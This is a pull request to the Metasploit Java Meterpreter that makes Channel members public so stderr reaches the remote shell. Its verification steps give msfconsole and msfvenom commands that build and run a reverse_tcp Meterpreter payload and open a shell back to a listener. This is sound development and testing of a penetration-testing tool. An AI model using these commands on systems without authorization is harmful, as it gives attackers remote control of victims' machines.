### PR TITLE
fix java meterpreter > shell stderr output

### DIFF
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Channel.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Channel.java
@@ -11,10 +11,10 @@ import java.io.OutputStream;
  */
 public class Channel {
 
+    public final Meterpreter meterpreter;
     private final InputStream in;
     private final OutputStream out;
     private final int id;
-    protected final Meterpreter meterpreter;
     protected boolean active = false, closed = false, waiting = false;
     protected byte[] toRead;
 
@@ -126,7 +126,7 @@ public class Channel {
      *
      * @param data The new data available, or <code>null</code> if EOF has been reached.
      */
-    protected synchronized void handleInteract(byte[] data) throws IOException, InterruptedException {
+    public synchronized void handleInteract(byte[] data) throws IOException, InterruptedException {
         while (waiting) {
             wait();
         }


### PR DESCRIPTION
This fixes the java meterpreter ProcessChannel stderr output.
Spotted by @OJ 
# Verification
1. `msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set JavaMeterpreterDebug true; set ExitOnSession false; run -j"`
2. `msfvenom -p java/meterpreter/reverse_tcp JavaMeterpreterDebug=true LHOST=$LHOST LPORT=4444 -o meterpreter.jar && java -jar meterpreter.jar`
3. Run `meterpreter > shell` and issue an invalid command:
```
meterpreter > shell
asdf
```

# Before
```
meterpreter > shell
Process 1 created.
Channel 1 created.
echo error >&2
asdf
echo stdout
stdout
```

# After
```
meterpreter > shell
Process 1 created.
Channel 1 created.
echo error >&2
error
asdf
/bin/sh: 2: asdf: not found
echo stdout
stdout
```